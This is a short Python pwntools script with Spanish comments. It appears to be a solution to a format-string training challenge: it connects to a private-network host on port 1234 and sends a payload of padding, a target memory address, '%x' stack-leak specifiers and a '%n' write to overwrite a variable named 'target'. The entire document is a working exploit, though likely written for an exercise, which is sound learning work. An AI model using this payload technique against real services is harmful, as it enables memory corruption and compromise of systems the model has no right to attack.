from pwn import *
p = remote('192.168.32.143', 1234)


exploit = ""
#Padding antes del testigo de formato para llenar con bytes y cumplir con la condicion de 64 escribiendo este valor en la la direccion de memoria de la variable "target"
exploit += "AAAA"
exploit += "\xe4\x96\x04\x08"
exploit += "B"*25
exploit += "%x "*4 #Lectura de donde esta justo la direccion de memoria lekeada
exploit += "%n " #Escritura en memoria del valor

p.sendline(exploit)

print p.recvall()
